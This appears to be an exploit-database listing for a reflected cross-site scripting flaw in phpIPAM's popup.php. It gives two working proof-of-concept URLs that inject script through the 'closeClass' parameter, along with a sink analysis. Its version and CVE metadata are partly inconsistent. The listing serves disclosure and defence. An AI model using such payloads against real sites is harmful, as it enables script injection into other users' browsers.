header-logo
Suggest Exploit
vendor:
phpIPAM
by:
CodeSecLab
6.1
CVSS
HIGH
Reflected Cross Site Scripting (XSS)
79
CWE
Product Name: phpIPAM
Affected Version From: 1.5.2001
Affected Version To: 1.6
Patch Exists: NO
Related CWE: CVE-2023-24657
CPE: a:phpipam:phpipam:1.5.1
Metasploit:
Other Scripts:
Platforms Tested: Ubuntu, Windows
2024

phpIPAM 1.6 – Reflected Cross Site Scripting (XSS)

phpIPAM version 1.6 is vulnerable to reflected cross-site scripting (XSS) due to improper sanitization of user-supplied data in the 'closeClass' parameter of the 'popup.php' script. An attacker can exploit this by injecting malicious scripts into the parameter, leading to script execution in the context of the victim's browser.

Mitigation:

To mitigate this vulnerability, input validation and output encoding should be implemented to ensure that user-supplied data is properly sanitized before being displayed. Additionally, updating to a patched version (if available) is recommended.
Source

Exploit-DB raw data:

# Exploit Title: phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)
# Date: 2024-10-26
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/phpipam/phpipam
# Software Link: https://github.com/phpipam/phpipam
# Version: 1.5.1
# Tested on: Ubuntu Windows
# CVE : CVE-2023-24657
PoC:
1)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%3E%3Cscript%3Ealert(1)%3C/script%3E
2)http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22


    "Sink": "print @$_REQUEST['closeClass']",
    "Vulnerable Variable": "closeClass",
    "Source": "$_REQUEST['closeClass']",
    "Sanitization Mechanisms Before Patch": "None",
    "Sink Context Constraints": "Reflected within HTML attributes without escaping",
    "Attack Payload": "\" onclick=\"alert(1)\"",
    "Execution Path Constraints": "Directly accessed from the 'closeClass' parameter without modification",
    "Request URL": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22",
    "Request Method": "GET",
    "Final PoC": "http://phpipam/app/tools/subnet-masks/popup.php?closeClass=%22%20onclick=%22alert(1)%22"



[Replace Your Domain Name]

Navigation

Suggest Exploit

Services By CQR